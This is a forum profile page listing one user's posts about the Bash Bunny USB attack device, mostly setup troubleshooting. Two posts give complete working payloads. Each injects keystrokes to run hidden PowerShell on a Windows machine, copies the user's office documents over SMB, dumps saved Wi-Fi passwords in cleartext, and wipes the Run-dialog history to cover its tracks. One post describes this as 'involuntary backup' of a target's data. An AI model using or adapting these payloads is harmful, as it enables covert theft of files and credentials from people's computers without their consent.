Jump to content

jblk01

Active Members
  • Posts

    35
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Is it possible that a data line isn't making good contact but the 5V line for power is?
  2. @HD3 what about 'lsblk' and 'lsusb' ? If it's still not detected, try running 'sudo dmesg -w' and then plugging in the Bunny in arming mode. I'd also try running this command too: 'sudo screen /dev/ttyACM0 115200'
  3. Now you can involuntary backup more of the targets data by writing to the microSD card instead of the internal storage. Prerequisite: SSH or serial into your Bunny MK2 and do the following: 'timedatectl set-time' followed by the current year, month and date. Run: 'apt update ; apt install gcc' 'cd /tools' 'wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz' 'tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/' 'rm -f impacket-0.9.19.tar.gz' 'cd impacket' 'pip install -r requirements.txt' 'cd ../' 'mkdir tmp' 'cd tmp' 'pip2 install setuptools-rust' 'pip2 install cryptography' 'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg' 'rm -f pyans1-0.4.8-py2.7.egg' 'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz' 'tar -xzvf pycryptodomex-3.10.1.tar.gz' 'cd pycryptodomex-2.10.1 && python setup.py install' 'cd /tools/' 'rm -rf tmp/' 'cd impacket/ && python setup.py install' Now on your microSD card, create the following directory structure: /smb |___loot/ |___s.ps1 Copy the following payload.txt into either switch 1 or switch 2: ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Mound SD as udisk udisk mount ######## ETHERNET STAGE ######## LED STAGE1 # Start the SMB Server python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log & ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 GET HOST_IP LED STAGE2 ATTACKMODE HID RNDIS_ETHERNET Q GUI r Q DELAY 500 Q STRING cmd /C \"start /b powershell -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" Q ENTER LED SPECIAL # Wait until files are done copying while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE # Sync file system sync # Unmount the SD card udisk unmount ######## FINISH ######## # Trap is clean sync LED FINISH shutdown 0 Finally here is the s.ps1: $exfil_dir="$Env:UserProfile\Downloads" $exfil_dir1="$Env:UserProfile\Documents" $exfil_dir2="$Env:UserProfile\Desktop" $exfil_ext="*.doc*" $exfil_ext1="*.pdf*" $exfil_ext2="*.xls*" $exfil_ext3="*.ppt*" $loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" mkdir $loot_dir robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z robocopy $exfil_dir1 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z robocopy $exfil_dir2 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$loot_dir\$env:UserName".txt" New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Now, eject the microSD card, insert into your Bunny MK2, move the switch to the one where the payload.txt is placed and insert it into a Windows 10 machine. If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂
  4. Hi @KinderRiegel, I was seeing the same error as you and i found a workaround: Make sure your internet connection is shared with the Bunny. Then on the Bunny: First, do 'timedatectl set-time' followed by the current year, month and date. Then, go into the /tools/impacket/ directory and run 'pip install -r requirements.txt'. For me, this failed on a few requirements so I had to go in and: 'pip2 install setuptools-rust' 'pip2 install cryptography' 'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg' 'rm -f pyans1-0.4.8-py2.7.egg' 'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz' 'tar -xzvf pycryptodomex-3.10.1.tar.gz' 'cd pycryptodomex-2.10.1 && python setup.py install' 'cd /tools/impacket/ && python setup.py install' And from there it was working properly. 🙂
  5. Thank you @Jtyle6, does that mean that the /payloads/library/ directory is no longer exposed to the Windows (or whatever OS) machine when using "ATTACKMODE STORAGE" ?
  6. I've re-read the docs regarding the Mark2 and I'm still confused. Does my switch1 and switch2 directories need to be on the internal storage or the SD card? Also, can I have only the microSD card be presented to the host machine for loot to be written to and the payloads executed from the internal Bunny storage, so that Windows Defender doesn't zap my payloads library? If anyone can give some example payloads so that I can grasp it I'd be most grateful.
  7. Hey @joeservo, sorry that I'm late. I realized that I partially rewrote the script and didn't share it here, I apologize for that. Here it is for both you and others if need be: #!/bin/bash # # Title: Faster SMB Exfiltrator version 2.0 # Author: Hak5Darren # Props: ImNatho, mike111b, madbuda, jblk01 # Version: 1.6.1 # Category: Exfiltration # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Ethernet # # REQUIREMENTS # ============ # SETUP: # # 1. apt update ; apt install gcc # 2. pip install impacket # 3. cd /tools/ # 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz # 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ # # # LED STATUS # ========== # FAIL........Failed to find dependencies # STAGE1......Ethernet Stage # STAGE2......HID Stage # SPECIAL.....Receiving Files # CLEANUP.....Moving Liberated Files # FINISH......Finished # # OPTIONS # ======= # Exfiltration options configured from included s.ps1 script ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Make temporary loot directory mkdir -p /loot/smb/ # Delete any old exfiltration data rm -rf /loot/smb/* # Copy new powershell payload to smb share cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ # Make loot directory on USB Disk mkdir -p /root/udisk/loot/smb_exfiltrator ######## ETHERNET STAGE ######## LED STAGE1 ATTACKMODE RNDIS_ETHERNET # Start the SMB Server python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 GET HOST_IP LED STAGE2 ATTACKMODE HID RNDIS_ETHERNET RUN WIN powershell Q DELAY 1000 Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" Q DELAY 500 Q ENTER LED SPECIAL # Wait until files are done copying while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /loot/smb/EXFILTRATION_COMPLETE # Move files to udisk loot directory mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator # Clean up temporary loot directory rm -rf /loot/smb/e/* # Sync file system sync ######## FINISH ######## # Trap is clean LED FINISH
  8. I know it can do keystroke injection, but what about things the Bunny can do? Such as pretending to be a second network adapter, give the target a second IP address and then run an nmap scan against the target? Edit: I just saw it has Ethernet, Serial etc. on the product page. Never mind. 🙂
  9. It's available here but doesn't seem to be listed on the Essentials Field Kit page. Any thoughts @Darren Kitchen?
  10. @Geesknees - Try to access the BB via SSH or Serial. If you wish to use SSH (my preferred method) then create a payload.txt file in either the switch1 directory or the switch2 directory and enter this: LED M FAST ATTACKMODE AUTO_ETHERNET Save the file, remove the Bunny and then reinsert it using whichever switch directory you used. Then ssh into it: ssh -l root 172.16.64.1 Password is: hak5bunny Then run: 'udisk unmount' and then run 'udisk reformat'. This should remove all of the old files on the user accessable partition.
  11. @Foxtrot - As per my pull request on Github, I had to use a newer release of Impacket to achieve setting a username / password combo for the SMB server in my smb_exfiltrator v2 payload. Would you consider updating the .deb file here with the latest release of Impacket?
  12. @WV09 - I'm glad it works for you! My first time modifying a payload to that degree, so I was worried it might fail. I hope they add it to the main repo too.
  13. REM Play the Imperial March STRING while ($true) { ENTER STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000); ENTER STRING } ENTER Done 🙂
  14. Okay, I got it working on my machine so that Windows does not complain. Here is my pull request: https://github.com/hak5/bashbunny-payloads/pull/392 And the files are here: https://github.com/jblk01/bashbunny-payloads/tree/master/payloads/library/exfiltration/smb_exfiltratorV2.0
  15. @WV09 - I have updates. I factory reset my Bunny, then I installed the latest firmware (1.6). From there I did the following: You should now see a '-username' and a '-password' option. Setting these in the payload.txt along with telling Windows to authenticate with it via NET USE should make this work. I am now on my way to get my Windows 10 machine from my friend's place. I'll keep you posted.
×
×
  • Create New...